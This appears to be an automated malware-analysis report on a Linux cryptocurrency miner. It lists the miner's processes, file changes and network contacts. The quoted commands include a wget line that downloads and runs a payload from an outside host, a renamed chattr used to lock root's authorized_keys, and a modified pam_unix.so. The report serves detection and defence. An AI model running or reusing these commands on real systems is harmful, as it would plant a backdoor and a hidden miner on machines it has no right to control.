Technical Information
Malicious functions:
Launches itself as a daemon
Gets access to SSH keys
- /root/.ssh/authorized_keys
Launches processes:
- sh -c /bin/mv /usr/bin/chattr /usr/bin/t
- /bin/mv /usr/bin/chattr /usr/bin/t
- sh -c /usr/bin/t +i /root/.ssh/authorized_keys
- /usr/bin/t +i /root/.ssh/authorized_keys
- sh -c wget -c http://a.powerofwish.com/miner2 -O /tmp/miner2 && chmod 755 /tmp/miner2 && /tmp/miner2
- wget -c http://a.powerofwish.com/miner2 -O /tmp/miner2
- chmod 755 /tmp/miner2
- /tmp/miner2
Performs operations with the file system:
Modifies file access rights:
- /tmp/miner2
Creates folders:
- /root/.ssh
Creates or modifies files:
- /lib/x86_64-linux-gnu/security/pam_unix.so
- /usr/bin/chattr
- /tmp/miner2
- /var/run/bioset
- /run/bioset
Network activity:
Awaits incoming connections on ports:
- 127.0.0.1:4048
Establishes connection:
- <LOCAL_DNS_SERVER>
- 10#.#7.128.57:0
- 17#.##.210.251:0
- 10#.#7.129.57:0
- [2#######0:3036::ac43:d2fb]:0
- [2#######0:3035::681b:8139]:0
- [2#######0:3036::681b:8039]:0
- 10#.##8.88.137:3333
HTTP GET requests:
- a.######fwish.com/miner2
DNS ASK:
- a.####rofwish.com
- su###.#puminerpool.com
Sends data to the following servers:
- 10#.##8.88.137:3333
Receives data from the following servers:
- 10#.##8.88.137:3333